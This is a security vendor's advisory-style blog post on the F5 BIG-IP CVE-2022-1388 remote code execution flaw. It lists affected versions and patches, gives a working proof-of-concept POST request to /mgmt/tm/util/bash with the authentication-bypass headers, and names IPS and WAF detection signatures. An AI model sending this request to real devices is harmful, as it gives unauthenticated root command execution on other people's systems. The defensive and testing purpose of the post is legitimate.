Simulating and Preventing F5 BIG-IP CVE-2022-1388 RCE Exploits

On May 18th, 2022, The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory on the remote code execution (CVE-2022-1388) vulnerability found in the F5 BIG-IP products [1]. When exploited, the CVE-2022-1388 vulnerability allows attackers to run arbitrary code and gain control of affected products.

Picus Labs has updated the Picus Threat Library with simulations for CVE-2022-1388 vulnerability exploitation attacks affecting F5 BIG-IP products.

Start simulating CVE-2022-1388 attacks with a 14-Day Free Trial of the Picus Platform 

What Is the CVE-2022-1388 Vulnerability?

F5 Networks published information about the CVE-2022-1388 remote code execution vulnerability on May 4th, 2022 [2]. An unauthenticated adversary with network access may exploit CVE-2022-1388 vulnerability to execute arbitrary commands using the management port or self-IP address. 

"/mgmt/tm/util/bash" service in F5 BIG-IP is a feature that allows users to run commands as the root user of the BIG-IP. The service does not require a password or authentication. Therefore, if adversaries have network access to affected F5 BIG-IP products, they can execute commands remotely with elevated privileges. 

What Is the Impact of the CVE-2022-1388 Vulnerability?

48 of the Fortune 50 companies use F5 products. Due to its wide use, the exploitation of CVE-2022-1388 may have serious consequences. Since the vulnerability allows unauthenticated attackers to execute arbitrary code on F5 BIG-IP products, the CVSSv3 base score for CVE-2022-1388 is 9.8 Critical

CVE-2022-1388 vulnerability enables remote code executions on systems running vulnerable F5 BIG-IP versions and allows the attacker complete control of the affected server.  For example, attackers can exploit CVE-2022-1388 to run malicious codes and install webshells as backdoors on vulnerable systems for maintaining access and post-exploitation.

Which F5 BIG-IP Versions Are Affected?

Affected and fixed F5 BIG-IP versions are shown in the below table:

Affected Versions

Fixed Version

16.1.0 - 16.1.2

16.1.2.2

15.1.0 - 15.1.5

15.1.5.1

14.1.0 - 14.1.4

14.1.4.6

13.1.0 - 13.1.4

13.1.5

12.1.0 - 12.1.6

Not fixed - EOL

11.6.1 - 11.6.5

Not fixed - EOL

What Is the Current Situation?

F5 released a patch for affected products on May 4th, 2022, alongside the security advisory of the vulnerability. 17.x versions are not affected by the CVE-2022-1388 vulnerability. Since versions 12.1.x and 11.6.x are end-of-life (EOL), the patches are not available for these versions. 

What Should You Do?

Since F5 BIG-IP is a widely used product and public proof-of-concept (PoC) codes for exploiting the CVE-2022-1388 vulnerability are available, the users are advised to patch their affected products without delay.  

CVE-2022-1388 F5 BIG-IP PoC Exploit

The following conditions are required to exploit CVE-2022-1388 vulnerability: 

  • A POST request must be sent to the vulnerable endpoint, which is "/mgmt/tm/util/bash"
  • X-F5-Auth-Token must be present as a header
    • Example: X-F5-Auth-Token: 0
  • The "Authorization" header must contain the "admin" username and any password.
    • Example: Authorization: Basic YWRtaW46 YWRtaW46 is the Base64 encoded version of “admin:”, which means the username is "admin" and password is "" (empty), which is also valid.
  • The "Connection" header must contain the "X-F5-Auth-Token" header field
    • Example: Connection: X-F5-Auth-Token
  • The "Host" header must be localhost / 127.0.0.1, or the "Connection" header must include "X-Forwarded-Host"
    • Example: Connection: X-F5-Auth-Token, X-Forwarded-Host
  • The value of the "command" parameter in the POST request must be "run"
    • Example: "command": "run"
  • The value of the "utilCmdArgs" parameter in the POST request must be a valid Linux command.
    • Example: "utilCmdArgs": " -c 'whoami' "

Therefore, you can test your F5 BIG-IP devices against CVE-2022-1388 vulnerability exploitation attacks with the following POST request:

POST /mgmt/tm/util/bash HTTP/1.1
Host: <IP_of_target_f5_product>:8443

X-F5-Auth-Token: 0

Authorization: Basic YWRtaW46
Connection: X-F5-Auth-Token, X-Forwarded-Host

X-Forwarded-For: localhost

Content-Length: 0


{"command": "run" , "utilCmdArgs": " -c 'whoami' " }

Example Code: Proof of Concept POST request for CVE-2022-1388 exploit

How Picus Helps Simulate and Prevent CVE-2022-1388 F5 BIG-IP Remote Code Execution Exploits?

We also strongly suggest simulating CVE-2022-1388 vulnerability to test the effectiveness of your security controls like Web Application Firewalls (WAF), Intrusion Prevention Systems (IPS), and NGFW against F5 BIG-IP RCE attacks using the Picus’ The Complete Security Control Validation Platform. You can test your defenses against CVE-2022-1388 vulnerability and hundreds of commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for CVE-2022-1388 vulnerability: 

Threat ID

Threat Name

97569

F5 Web Attack Campaign

This threat in Picus Threat Library also includes the following actions for previous F5 BIG-IPvulnerabilities: 

CVE

Threat Name

CVE-2020-5902

F5 BIG-IP Local File Inclusion (LFI) Vulnerability

CVE-2020-5902

F5 BIG-IP Remote Code Execution (RCE) Vulnerability


Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2022-1388 F5 BIG-IP RCE and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures:

Security Control

Signature ID

Signature Name

Cisco Firepower NGFW

1.57336.3

POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt

Cisco Firepower NGFW

1.59735.2

SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt

Cisco SourceFire IPS

1.57336.3

POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt

Cisco SourceFire IPS

1.59735.2

SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt

Citrix Web App Firewall

999945

web-misc apache http server authentication bypass vulnerability in ap_get_basic_auth_pw() via basic authorization headers

Forcepoint NGFW

 

HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388

Forcepoint NGFW

 

HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service

Fortigate IPS

51543

applications3: F5.BIG-IP.iControl.REST.Authentication.Bypass

F5 BIG-IP ASM

200013045

BIG-IP iControl REST Authentication Bypass (3)

Snort IPS

1.57336.1

POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt

Snort IPS

1.59735.2

SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt

Snort IPS

1.57336.3

POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt

Trend Micro Tipping Point

12639

HTTP: Apache HTTP Server X-Forwarded-For Denial-of-Service


Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trialof Picus’ The Complete Security Control Validation Platform.

References

[1] https://www.cisa.gov/uscert/sites/default/files/publications/AA22-138A-Threat_Actors_Exploiting_F5_BIG-IP_CVE-2022-1388_F5.pdf

[2] https://support.f5.com/csp/article/K23605346